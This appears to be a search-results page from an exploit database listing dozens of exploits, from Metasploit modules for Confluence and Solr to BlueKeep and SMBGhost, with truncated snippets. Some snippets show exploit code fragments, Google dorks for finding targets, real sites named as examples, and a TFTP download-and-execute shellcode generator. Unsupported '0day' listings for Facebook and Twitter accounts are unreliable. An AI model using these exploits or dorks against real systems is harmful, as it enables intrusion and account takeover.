39001 matches found
WeBID CSRF Vulnerability (All Version)
Exploit for php platform in category web applications Title : WeBID CSRF Vulnerability All Version Author : L3b-r1'z Date : 12.MAR.30 Security : LOW Google Dork : allintext: "powered by webid" Note : Works IF magicquotesgpc = off . P0C : Example Site : http://mcs-1.com/ http://usedwiiu.com/...
Xerox Printers Authenticated Remote Code Execution Vulnerability
Various Xerox printers, such as models EC80xx, AltaLink, VersaLink, and WorkCentre, suffer from an authenticated remote code execution vulnerability. ======================================================================= title: Authenticated Remote Code Execution product: Multiple Xerox printers...
WordPress Twenty Seventeen 3.0 Cross-origin resource sharing information Vulnerability
Title: WordPress 6.0.2 - THEME - Twenty Seventeen: 3.0- CORS-Vulnerability Author: nu11secur1ty Vendor: https://wordpress.org/ Software: Twenty SeventeenVersion: 3.0 Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Twenty-Seventeen-3.0 Description: The...
Hikvision Web Server Build 210702 - Command Injection Exploit
Exploit Title: Hikvision Web Server Build 210702 - Command Injection Exploit Author: bashis Vendor Homepage: https://www.hikvision.com/ Version: 1.0 CVE: CVE-2021-36260 Reference: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html All credit to WatchfulIP...
Samba 3.6.3 remote root exploit
Exploit for linux platform in category remote exploits =========================================================== == Subject: "root" credential remote code execution. == == CVE ID: CVE-2012-1182 == == Versions: Samba 3.0.x - 3.6.3 inclusive == == Summary: Samba 3.0.x to 3.6.3 are affected by a =...
Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution Exploit
Exploit for php platform in category web applications !/bin/sh if "$" -ne 4 ; then echo '! Usage: ' 1&2 exit 1 fi BASE="$1" USERNAME="$2" PASSWORD="$3" COMMAND="$4" JAR="$mktemp" trap 'rm -f "$JAR"' EXIT echo "+ Logging in as $USERNAME:$PASSWORD" 1&2 curl -si -c "$JAR" "$BASE/login.php" \ -d...
Winplot (.wp2 File) Local Buffer Overflow Exploit
Exploit for unknown platform in category local exploits ================================================= Winplot .wp2 File Local Buffer Overflow Exploit ================================================= Author: Rick Software: http://math.exeter.edu/rparris/peanut/wp32z.exe Version: Compiled in 1...
Microsoft SQL Server Reporting Services 2016 - Remote Code Execution Exploit
Exploit Title: Microsoft SQL Server Reporting Services 2016 - Remote Code Execution Google Dork: inurl:ReportViewer.aspx Exploit Author: West Shepherd Vendor Homepage: https://www.microsoft.com Version: Microsoft SQL Server 2016 32-bit/x64 SP2 CU/GDR, Microsoft SQL Server 2014 32-bit/x64 SP3...
Apache Solr 8.3.0 Velocity Template Remote Code Execution Exploit
This Metasploit module exploits a vulnerability in Apache Solr versions 8.3.0 and below which allows remote code execution via a custom Velocity template. Currently, this module only supports Solr basic authentication. From the Tenable advisory: An attacker could target a vulnerable Apache Solr...
Verot 2.0.3 - Remote Code Execution Exploit #RCE
Exploit for php platform in category web applications Exploit Title: Verot 2.0.3 - Remote Code Execution Date: 2019-12-05 Exploit Author: Jinny Ramsmark Vendor Homepage: https://www.verot.net/phpclassupload.htm Software Link: https://github.com/verot/class.upload.php Version: '; $quality = "85";...
D-Link DSL-2640T Cross Site Scripting Vulnerability
Exploit for hardware platform in category web applications Exploit Title: Multiple XSS Vulnerabilities in D-Link DSL-2640T Exploit Author: Anas Falhi/m0ti0nl3ss ,https://anasfalhi.blogspot.com. Tested on: D-Link DSL-2640T Tags: xss, cross site scripting, D-Link DSL-2640T router POC: a!XSS via GET...
E-topbiz ViralDX 2.07 (adclick.php bannerid) SQL Injection Vulnerability
Exploit for unknown platform in category web applications ======================================================================== E-topbiz ViralDX 2.07 adclick.php bannerid SQL Injection Vulnerability ======================================================================== Viral DX 1 SQL Injecti...
phpVibe 3.1 Persistent XSS Vulnerability
This exploit allow attackers to inject script code in members list 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS,...
Microsoft Office / WordPad Remote Code Execution Vulnerability
Exploit for windows platform in category remote exploits CVE-2017-0199 Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows API =================================================== Vulnerability description =================================================== A remote code executi...
SSL MITM Vulnerability
Exploit for unknown platform in category remote exploits ====================== SSL MITM Vulnerability ====================== Title: SSL MITM Vulnerability CVE-ID: OSVDB-ID: Author: Pavel Kankovsky Published: 2009-11-09 Verified: yes view source print? include include include include include...
Windows/x64 (10) - WoW64 Egghunter Shellcode (50 bytes)
include include include include using namespace std; / Title: WoW64Egghunter for Windows 10 32bit apps on 64bit Windows 10 Size: 50 bytes Date: 26/08/2018 Author: n30m1nd - https://www.exploit-db.com/author/?a=8766 Works in: 32 bit processes on a 64 bit Windows 10 OS How to: Compile under Visual...
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation / Remote Code Execution Exploit
/ LPE and RCE in OpenSMTPD's default install CVE-2020-8794 Copyright C 2020 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or at...
Supervisor XML-RPC Authenticated Remote Code Execution Exploit
This Metasploit module exploits a vulnerability in the Supervisor process control software, where an authenticated client can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. The commands will be run as the same user as supervisord. Depending o...
Moodle 4.3 Remote Code Execution 0day Exploit
Pre-authentication exploit affecting recent versions of Moodle. The exploit allow remote code execution, work with default installations and should not require any authentication or user interaction...
Hospital Patient Record Management System v1.0 SQL injection Vulnerability
Title: Hospital Patient Record Management System v1.0 SQLi Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html Reference:...
Apache Storm Nimbus 2.2.0 Command Execution Exploit
This Metasploit module exploits an unauthenticated command injection vulnerability within the Nimbus service component of Apache Storm. The getTopologyHistory RPC method method takes a single argument which is the name of a user which is concatenated into a string that is executed by bash. In ord...
PhotoKorn Gallery <= 1.52 (dir_path) Remote File Include Vulnerabilities
Exploit for unknown platform in category web applications ======================================================================== PhotoKorn Gallery 1.52 dirpath Remote File Inclusion Exploit ==================================================================== Critical Level : Dangerous By Saudi...
network411 (Product.asp?intProdID) SQL Injection Vulnerability
Exploit for php platform in category web applications ============================================================== network411 Product.asp?intProdID SQL Injection Vulnerability ============================================================== Author : Shamus Location : Solo && Jogjakarta, Indonesia...
Mozilla Firefox 67 - Array.pop JIT Type Confusion Exploit
Exploit Title: Mozilla Firefox 67 - Array.pop JIT Type Confusion Type: RCE Platform: Windows Exploit Author: deadlock Forrest Orr Author Homepage: https://forrest-orr.net Vendor Homepage: https://www.mozilla.org/en-US/ Software Link: https://ftp.mozilla.org/pub/firefox/releases/65.0.1/win64/en-US...
Sar2HTML 3.2.1 - Remote Command Execution Exploit
Exploit for php platform in category web applications Exploit Title: sar2html Remote Code Execution Exploit Author: Furkan KAYAPINAR Vendor Homepage:https://github.com/cemtan/sar2html Software Link: https://sourceforge.net/projects/sar2html/ Version: 3.2.1 Tested on: Centos 7 In web application y...
Atlassian Confluence Namespace OGNL Injection Exploit
This Metasploit module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to evaluate an OGNL expression resulting in OS command execution. This module requires Metasploit: https://metasploit.com/download Current source:...
Joomla Component com_fabrik File Upload Vulnerability
Exploit for php platform in category web applications $ $ +================================================= ================+ | Joomla Component comFabrik Remote Shell Upload Vulnerability | +================================================= ================+ Google Dork :...
GetSimpleCMS - Unauthenticated Remote Code Execution Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "GetSimpleCMS Unauthenticated RCE", 'Description' = %q This module exploits a vulnerability found in GetSimpleCMS, which allows unauthenticated...
Opencart <= 1.5.6.3 Upload Shell Vulnerability
Exploit for php platform in category web applications Exploit Title: Opencart Downloads and upload file This trick works by renaming the error log file from error.txt to error.php or whatever.php and make an wrong sql query in order to log it 1.Go to System - Settings - Edit Your Store - Server T...
Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)
Exploit for linux platform in category dos / poc Linux snd-usb-audio Multiple Free Date: March 4th, 2016 Authors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg CVE: not yet assigned CVSS: 4.9 AV:L/AC:L/Au:N/C:N/I:N/A:C Title: Local RedHat Enterprise Linux DoS â?? RHEL 7.1 Kernel crashes...
ManageEngine ADSelfService Plus Authentication Bypass / Code Execution Exploit
This Metasploit module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service. This module requires Metasploit:...
MikroTik RouterOS Null Pointer Dereference / Division-By-Zero Vulnerability
MikroTik RouterOS versions prior to stable 6.47 suffer from multiple null pointer dereference vulnerabilities and one division-by-zero vulnerability. MikroTik RouterOS Null Pointer Dereference / Division-By-Zero Vulnerability Details ======= Product: MikroTik's RouterOS Affected Versions: through...
glibc ld.so Local Privilege Escalation Vulnerability
Dubbed Looney Tunables, Qualys discovered a buffer overflow vulnerability in the glibc dynamic loader's processing of the GLIBCTUNABLES environment variable. This vulnerability was introduced in April 2021 glibc 2.34 by commit 2ed18c. Looney Tunables: Local Privilege Escalation in the glibc's ld....
pfSense 2.1.3-RELEASE (amd64) Remote Command Execution Exploit
pfSense, a free BSD based open source firewall distribution, versions 2.2.6 and below contain a remote command execution vulnerability post authentication in the rrdgraphimg.php page. The vulnerability occurs via the graph GET parameter. A non-administrative authenticated attacker can inject...
PHPMailer 5.2.17 - Remote Code Execution Exploit
Exploit for php platform in category web applications !/bin/bash CVE-2016-10033 exploit by opsxcq https://github.com/opsxcq/exploit-CVE-2016-10033 echo '+ CVE-2016-10033 exploit by opsxcq' if -z "$1" then echo '- Please inform an host as parameter' exit -1 fi host=$1 echo '+ Exploiting '$host cur...
Microsoft Windows 10 (1903/1909) - (SMBGhost) SMB3.1.1 Local Privilege Escalation Exploit
Microsoft Windows 10 1903/1909 - 'SMBGhost' SMB3.1.1 'SMB2COMPRESSIONCAPABILITIES' Local Privilege Escalation CVE-2020-0796 Windows SMBv3 LPE Exploit Authors Daniel GarcÃa Gutiérrez @danigargu Manuel Blanco Parajón @dialluvioso References...
Primefaces 5.x - Remote Code Execution Exploit
Exploit for java platform in category web applications This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CVE-2017-1000486 Primefaces Remote Code Execution Exploit', 'Description' = %q This module...
Pyload Remote Code Execution Exploit
CVE-2024-28397 is a sandbox escape in js2py versions 0.74 and below. js2py is a popular python package that can evaluate javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference to a python object in the js2py environment enabling them to escape...
Facebook steal Group 0day Exploit
Exploit can steal facebook Group and delete the old administrator and create a new administrator...
OpenSSH 9.6 Remote Code Execution Exploit
OpenSSH version 9.6, which allows for command injection and remote code execution RCE. Exploit posing a significant risk to systems running the affected version...
Android Janus - APK Signature Bypass Exploit
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core/payload/apk' class MetasploitModule "Android Janus APK Signature bypass", 'Description' = %q This module exploits CVE-2017-13156 in Android to install ...
Cisco ISE 2.4.0 XSS / Remote Code Execution Exploit
Cisco Identity Services Engine ISE version 2.4.0 suffers from cross site scripting, java deserialization, and in conjunction can lead to remote code execution. Full exploit provided. Multiple vulnerabilities in Cisco Identity Services Engine Unauth XSS to RCE as root Discovered by Pedro Ribeiro...
Microsoft Windows 7 (x86) - (BlueKeep) RDP Remote Windows Kernel Use After Free Exploit
EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47683.zip import rdp import socket import binascii import time def poolsprays, crypter, payload: times = 10000 count = 0 while count times: count += 1 print'time through %d' % count try:...
Microsoft Edge 44.18362.449.0 - Denial Of Service Exploit
function blah var buff = '\x41'; var buffer = buff.repeat600000000; document.writebuffer;...
Cisco RV340 SSL VPN Unauthenticated Remote Code Execution Exploit
This Metasploit module exploits a stack buffer overflow in the Cisco RV series router's SSL VPN functionality. The default SSL VPN configuration is exploitable, with no authentication required and works over the Internet! The stack is executable and no ASLR is in place, which makes exploitation...
Twitter reset account Private Method 0day Exploit
Twitter reset any Account Private Method Exploit...
Windows/x86 - Download With TFTP And Execute Shellcode (Generator) (51-60 bytes)
!/bin/python Author: Semen Alexandrovich Lyhin. https://www.linkedin.com/in/semenlyhin/ This script generates x86 shellcode to download and execute .exe file via tftp. File name should be equal to: "1.exe" Lenght: 51-56 bytes, zero-free. import sys def GetOpcodesip,addr: command = r"tftp -i " + i...
Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload Exploit
This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in order to gain remote code execution as the oracle user. This module requires Metasploit:...
needrestart Local Privilege Escalation Vulnerability
LPEs in needrestart CVE-2024-48990, CVE-2024-48991, CVE-2024-48992, CVE-2024-10224, and CVE-2024-11003 ======================================================================== Contents ======================================================================== Summary Background CVE-2024-48990 and...
Cacti 1.2.26 Remote Code Execution Vulnerability
---------------------------------------------------------------- Cacti = 1.2.26 import.php Remote Code Execution Vulnerability ---------------------------------------------------------------- - Software Link: https://cacti.net - Affected Versions: Version 1.2.26 and prior versions. - Vulnerabilit...